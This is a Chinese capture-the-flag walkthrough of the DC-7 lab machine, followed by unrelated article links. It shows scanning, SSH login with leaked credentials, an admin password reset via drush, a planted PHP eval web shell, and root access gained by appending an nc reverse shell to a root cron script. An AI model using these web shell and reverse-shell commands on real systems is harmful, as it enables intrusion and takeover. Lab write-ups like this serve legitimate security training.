DC-7靶机

news2024/11/15 5:42:50

DC-7靶机地址

image-20230808204245221

同样的,把靶机跟kali放在同一网段,(NAT模式)

主机发现

arp-scan -l

image-20230808204710235

端口扫描

nmap -A -T4 -p- 192.168.80.139

image-20230808204838597

22端口开始,80端口开启

浏览器先访问一下靶机的80端口

image-20230808205223470

熟悉的Drupal站点

先爆破一下目录看看

dirsearch -u 192.168.80.139 -i 200

image-20230808205712637

进到 /usr/login目录下看看,发现是一个登录页面,这个时候没有密码,也不知道账户名

image-20230808205800137

DC-7首页也提示说:暴力或字典攻击,你可能不会成功,跳出框框思考,就需要从其他方向找突破口了。。。。

image-20230808210017690

用谷歌浏览器搜索一下Dc7User这么个关键词,发现有一个github

image-20230808211151203

进到 Dc7Usergithub里面,寻找,在一个config.php文件里出现用户名和密码这样的敏感信息

image-20230808211633738

$username = "dc7user";
$password = "MdR3xOgB7#dW";

尝试去网站里登录,结果报错

image-20230808211832025

那就再试试ssh登录,成功进入!!!

image-20230808211943245

查看都有什么文件 ,使用命令ls

image-20230808212239648

进入backups目录里,发现都是看不懂的,搜了一下gpg后缀格式,发现是一种加密的文件格式

image-20230808213123139

image-20230808212323437

再去看看mbox文件,发现里面内容重复的很多,是一封邮件,有一个可执行的脚本,

一个以root权限定期执行的备份任务,执行文件/opt/scripts/backups.sh

image-20230808212220436


使用cd命令切换到/opt/scripts/下看看

提示说cd /vat/www/html下,执行drush 命令

image-20230808212708654

查看backups.sh的权限,发现所有人都可以执行此文件

image-20230808214407873

drush即drupal shell,用于管理和操作drupal站点,可以用来修改管理员密码

Drush是Drupal的一个命令行shell和脚本接口

drush user-password admin --password="123456"  #修改密码

image-20230808215107935

账户admin密码123,登录成功!!!!!!!!!

image-20230808215304909

点击Manage ——> Content ——> Add content ——> Basic page功能,尝试添加php一句话木马,发现Drupal 8版本以后为了安全需要将php单独作为一个模块导入;需要去扩展里下载安装

image-20230808215839662

image-20230808215843571

URL的形式安装php8 https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

image-20230808220232587

image-20230808220101555

image-20230808221021740

Extend里的List里,往下滑动,找PHP有关的,勾选上PHP Filter往下滑有个install

image-20230808221001333

安装完成!!!

image-20230808221058719

然后来到Content写一个一句话木马

<?php eval(@$_POST['password']);?>

在这里插入图片描述

image-20230808221341600

打开中国 蚁剑连接,蚁剑要想连接就得知道,刚上传的一句话木马所在的位置

image-20230808221523643

在这里插入图片描述

蚁剑 测试连通性

在这里插入图片描述

kali开启监听

nc -lvvp 8989

image-20230808222034497

当前还只是普通用户,并没有管理员权限

在这里插入图片描述

进入交互shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20230808222532990

在新开的终端监听4444端口

image-20230808223046525

反弹shell到bashups.sh

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.80.141 4444 >/tmp/f" >> backups.sh
 

image-20230808223301341

等待计划任务执行,等等等…

image-20230809171557884

进到root家目录查看最终flag

image-20230809171701261

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/853831.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Linux】详解进程状态之僵尸进程——孤儿进程

目录 &#x1f31e;专栏导读 &#x1f31b;什么是进程 ⭐什么是PCB&#xff1f; &#x1f31b;查看进程 &#x1f31b;如何通过系统调用查看进程PID &#x1f31b;fork &#x1f31e;认识进程状态 &#x1f31b;查看进程状态 &#x1f31b;R状态 ⭐例如&#xff1a…

C 语言的 ctype.h 头文件

C 语言的 ctype.h 头文件包含了很多字符函数的函数原型, 可以专门用来处理一个字符, 这些函数都以一个字符作为实参. ctype.h 中的字符测试函数如表所示: 这些测试函数返回 0 或 1, 即 false 或 true. ctype.h 中的字符映射函数如表所示: 字符测试函数不会修改原始实参, 只会…

YOLOV5改进:更换为MPDIOU,实现有效涨点!

1.该文章属于YOLOV5/YOLOV7/YOLOV8改进专栏,包含大量的改进方式,主要以2023年的最新文章和2022年的文章提出改进方式。 2.提供更加详细的改进方法,如将注意力机制添加到网络的不同位置,便于做实验,也可以当做论文的创新点。 2.涨点效果:更换为MPDIOU,实现有效涨点! 目录…

C++代码生成静态LIB链接库及其调用方法

1、在进行C代码移植时可将CPP文件封装为静态lib链接库&#xff0c;本文章讲述了如何将cpp文件封装为lib文件。 2、假设有文件a.cpp、a.h、b.cpp、b.h以及main.cpp&#xff0c;假设main调用了b&#xff0c;b调用了a。现在需要将a.cpp以及b.cpp封装为a.lib以及b.lib。 3、在VS2…

Java8中forEach()里使用return的效果

先总结&#xff1a;使用forEach()处理集合时不能使用break和continue这两个方法&#xff0c;可以使用无返回值的return跳出此次循环&#xff0c;效果同标准for循环的continue。 首先&#xff0c;forEach()先对入参判空&#xff0c;然后使用增强for循环调用action.accept(t)&am…

VGG16模型详解

VGG16模型详解 0、VGG16介绍 VGG16是一种深度卷积神经网络&#xff0c;由牛津大学的研究团队于2014年开发。 VGG16在2014年的ImageNet Large Scale Visual Recognition Challenge (ILSVRC) 竞赛中取得了显著的成绩。它在图像分类任务中获得了当年的第二名&#xff0c;其准确…

【Java可执行命令】(二十一)线程快照生成工具 jstack:帮助开发人员分析和排查线程相关问题(死锁、死循环、线程阻塞...)

Java可执行命令之jstack 1️⃣ 概念2️⃣ 优势和缺点3️⃣ 使用3.1 语法格式3.2 使用步骤及技巧3.3 使用案例 4️⃣ 应用场景&#x1f33e; 总结 1️⃣ 概念 jstack 命令是 Java Development Kit&#xff08;JDK&#xff09;中提供的一项诊断工具&#xff0c;用于生成Java虚拟…

震坤行工业超市旗下震坤行智能制造(苏州)有限公司开工奠基仪式圆满成功

震坤行工业超市旗下震坤行智能制造&#xff08;苏州&#xff09;有限公司开工奠基仪式圆满成功 2023年7月3日&#xff0c;震坤行工业超市于太仓港经济技术开发区举行了震坤行智能制造&#xff08;苏州&#xff09;有限公司项目奠基动工仪式。震坤行董事长兼CEO陈龙&#xff0c…

基于OFDM通信系统的低复杂度的资源分配算法matlab性能仿真

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 5.算法完整程序工程 1.算法运行效果图预览 2.算法运行软件版本 matlab2022a 3.部分核心程序 .......................................................................%子载波分配[~,po…

Grafana技术文档-概念-《十分钟扫盲》

Grafana官网链接 Grafana: The open observability platform | Grafana Labs 基本概念 Grafana是一个开源的度量分析和可视化套件&#xff0c;常用于对大量数据进行实时分析和可视化。以下是Grafana的基本概念&#xff1a; 数据源&#xff08;Data Source&#xff09;&#…

idea+gradle阅读spring5.2.9源码之源码构建报错解决方案

注意 1、先确保gradle版本和spring、jdk版本对应 本文:gradle:5.6.4/spring 5.2.9/jdk1.8&#xff08;gradle和jdk都要先安装好&#xff0c;gradle还要配置好本地资源文件路径&#xff09; 2、原来项目乱了的话&#xff0c;先重新导入下载的源码项目 3、进入源码所在根目录&…

【iOS】autoreleasepool

来说一下最近在了解的autoreleasepool吧&#xff0c;我们可能平时书写过许多脑残代码&#xff0c;其有很多的缺陷但是我们可能当时学的比较浅就也不太了解&#xff0c;就像下面这样的&#xff1a; for (int i 0; i < 1000000; i) {NSNumber *num [NSNumber numberWithInt…

【前端 | CSS】aligin-items与aligin-content的区别

align-items 描述 CSS align-items 属性将所有直接子节点上的 align-self 值设置为一个组。align-self 属性设置项目在其包含块中在交叉轴方向上的对齐方式 align-items是针对每一个子项起作用&#xff0c;它的基本单位是每一个子项&#xff0c;在所有情况下都有效果&…

【uniapp】原生子窗体subNvue的使用与踩坑

需求 最近接到个需求, 需要在video组件上弹出弹窗, 也就是覆盖video这个原生组件 未播放时, 弹窗可以覆盖, 但是当video播放时, 写的弹窗就覆盖不了了 因为video是原生组件, 层级非常高, 普通标签是覆盖不了的, map标签同理 覆盖原生组件, 官方给出解决办法一. 使用cover-view…

文件传输软件常见问题解决办法大全

文件传输软件是我们工作中不可缺少的一种工具&#xff0c;它可以帮助我们快速、安全、稳定地传输各种文件&#xff0c;如文档、图片、视频等。但是在使用文件传输软件的过程中&#xff0c;我们也可能会遇到一些问题&#xff0c;影响我们的工作效率和传输质量。那么&#xff0c;…

【陈老板赠书活动 - 10期】- 【Python之光:Python编程入门与实战】

陈老老老板&#x1f9b8; &#x1f468;‍&#x1f4bb;本文专栏&#xff1a;赠书活动专栏&#xff08;为大家争取的福利&#xff0c;免费送书&#xff09; &#x1f468;‍&#x1f4bb;本文简述&#xff1a;生活就像海洋,只有意志坚强的人,才能到达彼岸。讲一些我刚进公司的学…

【ARM Cache 系列文章 9 番外篇 -- ARMv9 系列 Core 介绍】

文章目录 ARMv9 系列CoreARM Cortex-A510 介绍ARM Cortex-A715ARM Cortex-A720 ARMv9 系列Core 2021年5月Arm公布了其最新3款CPU和3款GPU核心设计&#xff0c;三款新CPU分别是旗舰核心Cortex-X2、高性能核心Cortex-A710、高能效核心Cortex-A510 CPU&#xff0c;三款新GPU核心则…

【Linux】深入探索Linux信号

目录 写在前面的话 什么是信号 生活中的信号 Linux下的信号 Linux常见信号 Core核心转储 信号如何产生 键盘组合键 1.如何理解信号被进程保存 2.如何理解信号发送的本质 通过系统调用向进程发送信号 kill() 手动实现kill指令 raise() abort()[非系统调用…

Django ORM 框架中的表关系,你真的弄懂了吗?

Django ORM 框架中的表关系 为了说清楚问题&#xff0c;我们设计一个 crm 系统&#xff0c;包含五张表&#xff1a; 1.tb_student 学生表 2.tb_student_detail 学生详情表 3.tb_salesman 课程顾问表 4.tb_course 课程表 5.tb_entry 报名表 表关系和字段如下图&#xff1a…

String 类的运用

目录 1.字符串构造 2.String对象的比较 2.1比较是否引用同一个对象 2. 2boolean equals(Object anObject) 2.3int compareTo(String s) 方法: 按照字典序进行比较 2.4int compareToIgnoreCase(String str) 3.字符串查找 4.2大小写转换 4.3字符串转数组 4.4 格式化 5.字…